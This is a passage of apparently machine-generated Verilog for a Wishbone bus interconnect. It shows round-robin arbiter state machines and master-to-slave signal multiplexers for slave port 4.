                    if ( s4_msel_arb2_req[6] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[7] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[0] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[1] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[2] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[3] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant5:
        begin
            if (  !( s4_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[6] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[7] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[0] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[1] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[2] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[3] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[4] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant6:
        begin
            if (  !( s4_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[7] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[0] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[1] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[2] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[3] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[4] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[5] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant7:
        begin
            if (  !( s4_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[0] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[1] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[2] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[3] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[4] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[5] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[6] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s4_msel_arb3_req = { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd3 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd3 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd3 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd3 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd3 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd3 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd3 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s4_msel_arb3_state <= s4_msel_arb3_grant0;
        end
        else
        begin 
            s4_msel_arb3_state <= s4_msel_arb3_next_state;
        end
    end
    always @ (  s4_msel_arb3_state or  { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd3 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd3 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd3 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd3 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd3 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd3 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd3 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s4_msel_arb3_next_state = s4_msel_arb3_state;
        case ( s4_msel_arb3_state ) 
        s4_msel_arb3_grant0:
        begin
            if (  !( s4_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[1] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[2] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[3] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[4] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[5] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[6] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[7] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant1:
        begin
            if (  !( s4_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[2] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[3] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[4] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[5] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[6] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[7] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[0] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant2:
        begin
            if (  !( s4_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[3] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[4] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[5] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[6] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[7] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[0] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[1] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant3:
        begin
            if (  !( s4_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[4] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[5] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[6] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[7] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[0] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[1] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[2] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant4:
        begin
            if (  !( s4_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[5] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[6] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[7] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[0] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[1] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[2] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[3] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant5:
        begin
            if (  !( s4_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[6] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[7] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[0] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[1] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[2] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[3] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[4] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant6:
        begin
            if (  !( s4_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[7] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[0] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[1] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[2] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[3] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[4] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[5] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb3_grant7:
        begin
            if (  !( s4_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s4_msel_arb3_req[0] ) 
                begin
                    s4_msel_arb3_next_state = s4_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s4_msel_arb3_req[1] ) 
                    begin
                        s4_msel_arb3_next_state = s4_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s4_msel_arb3_req[2] ) 
                        begin
                            s4_msel_arb3_next_state = s4_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s4_msel_arb3_req[3] ) 
                            begin
                                s4_msel_arb3_next_state = s4_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s4_msel_arb3_req[4] ) 
                                begin
                                    s4_msel_arb3_next_state = s4_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb3_req[5] ) 
                                    begin
                                        s4_msel_arb3_next_state = s4_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb3_req[6] ) 
                                        begin
                                            s4_msel_arb3_next_state = s4_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s4_msel_pri_out or  s4_msel_arb0_state or  s4_msel_arb1_state)
    begin
        if ( s4_msel_pri_out[0] ) 
        begin
            s4_msel_sel1 = s4_msel_arb1_state;
        end
        else
        begin 
            s4_msel_sel1 = s4_msel_arb0_state;
        end
    end
    always @ (  s4_msel_pri_out or  s4_msel_arb0_state or  s4_msel_arb1_state or  s4_msel_arb2_state or  s4_msel_arb3_state)
    begin
        case ( s4_msel_pri_out ) 
        2'd0:
        begin
            s4_msel_sel2 = s4_msel_arb0_state;
        end
        2'd1:
        begin
            s4_msel_sel2 = s4_msel_arb1_state;
        end
        2'd2:
        begin
            s4_msel_sel2 = s4_msel_arb2_state;
        end
        2'd3:
        begin
            s4_msel_sel2 = s4_msel_arb3_state;
        end
        endcase
    end
    assign s4_mast_sel = ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s4_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s4_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s4_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s4_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s4_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s4_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s4_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s4_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s4_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s4_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s4_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s4_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s4_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s4_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s4_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s4_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s4_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s4_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s4_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s4_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s4_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s4_m0_data_o = s4_data_i;
    assign s4_m1_data_o = s4_data_i;
    assign s4_m2_data_o = s4_data_i;
    assign s4_m3_data_o = s4_data_i;
    assign s4_m4_data_o = s4_data_i;
    assign s4_m5_data_o = s4_data_i;
    assign s4_m6_data_o = s4_data_i;
    assign s4_m7_data_o = s4_data_i;
    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s4_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s4_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s4_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s4_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s4_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s4_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s4_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s4_m0_cyc_r <= m0_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m1_cyc_r <= m1_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m2_cyc_r <= m2_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m3_cyc_r <= m3_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m4_cyc_r <= m4_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m5_cyc_r <= m5_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m6_cyc_r <= m6_s4_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s4_m7_cyc_r <= m7_s4_cyc_o;
    end
    always @ (  ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) or  m0_s4_cyc_o or  m1_s4_cyc_o or  m2_s4_cyc_o or  m3_s4_cyc_o or  m4_s4_cyc_o or  m5_s4_cyc_o or  m6_s4_cyc_o or  m7_s4_cyc_o or  s4_m0_cyc_r or  s4_m1_cyc_r or  s4_m2_cyc_r or  s4_m3_cyc_r or  s4_m4_cyc_r or  s4_m5_cyc_r or  s4_m6_cyc_r or  s4_m7_cyc_r)
    begin
        case ( ( ( ( s4_pri_sel == 2'd0 ) ) ? ( s4_arb_state ) : ( ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( s4_msel_arb0_state ) : ( ( ( ( s4_msel_pri_sel == 2'd1 ) ) ? ( s4_msel_sel1 ) : ( s4_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s4_wb_cyc_o = ( m0_s4_cyc_o & s4_m0_cyc_r );
        end
        3'd1:
        begin
            s4_wb_cyc_o = ( m1_s4_cyc_o & s4_m1_cyc_r );
        end
        3'd2:
        begin
            s4_wb_cyc_o = ( m2_s4_cyc_o & s4_m2_cyc_r );
        end
        3'd3:
        begin
            s4_wb_cyc_o = ( m3_s4_cyc_o & s4_m3_cyc_r );
        end
        3'd4:
        begin
            s4_wb_cyc_o = ( m4_s4_cyc_o & s4_m4_cyc_r );
        end
        3'd5:
        begin
            s4_wb_cyc_o = ( m5_s4_cyc_o & s4_m5_cyc_r );
        end
        3'd6:
        begin
            s4_wb_cyc_o = ( m6_s4_cyc_o & s4_m6_cyc_r );
        end
        3'd7:
        begin
            s4_wb_cyc_o = ( m7_s4_cyc_o & s4_m7_cyc_r );
        end
        endcase
    end
